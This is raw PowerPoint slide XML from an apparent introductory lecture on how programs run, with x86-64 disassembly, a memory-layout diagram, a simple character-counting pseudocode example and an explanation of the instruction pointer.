          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  400550:       48 8d 14 c5 00 00 00    lea    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rdx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*8+0x0]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400557:       00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400558:       48 8b 45 e0             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r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dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rax,QWORD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> PTR [rbp-0x20]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40055c:       48 01 d0                add    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rax,rdx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40055f:       48 8b 00                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r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dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rax,QWORD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> PTR [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]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400562:       48 89 c7                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r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dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rdi,rax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  400565:       e8 a6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fe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</a:rPr>
              <a:t>ff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</a:rPr>
              <a:t>ff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          call   400410 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>puts@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;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40056a:       83 45 fc 01             add    DWORD PTR [rbp-0x4],0x1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40056e:       8b 45 fc                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r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dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax,DWORD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> PTR [rbp-0x4]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400571:       3b 45 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmp</a:t>
            </a:r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dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax,DWORD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> PTR [rbp-0x14]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400574:       7c d5                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     40054b &lt;main+0x1e&gt;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400576:       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0a                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    400582 &lt;main+0x55&gt;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400578:       bf 14 06 40 00          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    edi,0x400614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40057d:       e8 8e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fe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</a:rPr>
              <a:t>ff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</a:rPr>
              <a:t>ff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          call   400410 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>puts@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;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400582:       b8 01 00 00 00          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    eax,0x1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400587:       c9                      leave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400588:       c3                      ret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B4D763-9FEE-4C2C-A78D-C2EE0A884D29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148076" y="583562"/>
            <a:ext cx="2279108" cy="6100043"/>
          </a:xfrm>
          <a:prstGeom prst="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A3F216-14F2-4C48-AF9A-9DF4DA9F27DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8524443" y="583561"/>
            <a:ext cx="3404111" cy="6100043"/>
          </a:xfrm>
          <a:prstGeom prst="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DB1642B6-6B36-4889-A4C5-DA728C739674}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="443671" y="343408"/>
            <a:ext cx="1801230" cy="634107"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8248"/>
              <a:gd name="adj2" fmla="val 1059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 Source Code</a:t>
            </a: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5E886970-E34E-415C-9C96-59EA4872BD91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3492180" y="687862"/>
            <a:ext cx="2110243" cy="905606"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 70430"/>
              <a:gd name="adj2" fmla="val -91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x84-64 machine code in hexadecimal</a:t>
            </a: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E16545A7-41BB-4C46-8921-75DD77B694AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6874734" y="5445415"/>
            <a:ext cx="1391626" cy="774525"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 70430"/>
              <a:gd name="adj2" fmla="val -91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x86-64 assembly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="368636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B3FD1-40EA-432C-A286-A9B673140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433196" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Computer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B7E7A-4158-4A3A-9991-2A74F262C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42121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Running programs exists in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Program memory – the code for the program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data memory – variables, constants, and a few other things, necessary for the program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OS memory – always available for system calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g. to open a file, print to the screen, etc.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67A1D1-3CC6-4B13-9F0B-972AFFAD9ED2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8731060" y="881546"/>
            <a:ext cx="2622740" cy="561781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CD840B-4B1D-4754-984C-B90D0160516D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8961908" y="365125"/>
            <a:ext cx="2161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Virtual Memory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E4E672-CDAA-485B-9583-9699C6DF79E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11340296" y="826790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 GB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2980C7-F5FE-4849-AB85-A7375AFA2548}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11399966" y="61972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046363-663B-48F7-8764-3BD8870A7650}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8788095" y="925351"/>
            <a:ext cx="2516986" cy="101295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Operating System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794B1F-A0E5-4496-950A-61A52B951827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8788095" y="2342579"/>
            <a:ext cx="2516986" cy="101295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Memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Variables)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C85F65-1EC8-40A5-8966-3505AFF405A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8783936" y="4603026"/>
            <a:ext cx="2516986" cy="10129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Program Memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Code)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="348191458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B3FD1-40EA-432C-A286-A9B673140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433196" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Program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B7E7A-4158-4A3A-9991-2A74F262C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8113" y="1825625"/>
            <a:ext cx="6384373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integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> count(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string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> s, 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character</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> c) {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integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> count;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integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt; length(s); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (s[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>] == c) count = count + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> count;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18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void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"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main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(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integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 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strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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count(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“testing”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0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“t”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// should return 2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CD840B-4B1D-4754-984C-B90D0160516D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9413956" y="365125"/>
            <a:ext cx="1256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Memory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E4E672-CDAA-485B-9583-9699C6DF79E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11340296" y="826790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2980C7-F5FE-4849-AB85-A7375AFA2548}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11399966" y="6197293"/>
            <a:ext cx="568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C85F65-1EC8-40A5-8966-3505AFF405A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8786082" y="2922521"/>
            <a:ext cx="2516986" cy="10129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Program Memory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369C03-1A8F-4186-9F55-472D98B5C2F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8722391" y="826790"/>
            <a:ext cx="0" cy="556305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CDC6264-C836-4FF5-9E0D-22D2C943BE57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11366759" y="826790"/>
            <a:ext cx="0" cy="556305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D67E3C3-5953-4380-8F73-9F71921817FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="941781" y="1825625"/>
            <a:ext cx="702874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0:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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1: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2: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3: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4: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5:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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6: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7: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8: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23B78713-8CC2-4BAC-8E70-A542D06A5548}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7676580" y="1615257"/>
            <a:ext cx="982062" cy="4742681"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2" fmla="val 36861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5A080C8E-FFB2-4DB6-82F5-FE53CA42626B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250217" y="4922428"/>
            <a:ext cx="980105" cy="86512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IP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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DE7204FA-DE5E-413D-BECD-034ADDBC06CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1288126" y="3068891"/>
            <a:ext cx="3227295" cy="1577788"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -51944"/>
              <a:gd name="adj2" fmla="val 7386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The CPU keeps track of the current Instruction Pointer (IP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="300460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96296E-6 L -0.00039 0.05324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0.05324 L -0.00039 -0.49236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49236 L -0.00039 -0.325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325 L -0.00039 -0.28079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26574 L -0.00039 -0.21783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0.21783 L -0.00039 -0.325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0.32269 L 2.91667E-6 -0.10718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0.10695 L 0.00013 0.1125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6" grpId="2" animBg="1"/>
      <p:bldP spid="16" grpId="3" animBg="1"/>
      <p:bldP spid="16" grpId="4" animBg="1"/>
      <p:bldP spid="16" grpId="5" animBg="1"/>
      <p:bldP spid="16" grpId="6" animBg="1"/>
      <p:bldP spid="16" grpId="7" animBg="1"/>
      <p:bldP spid="16" grpId="8" animBg="1"/>
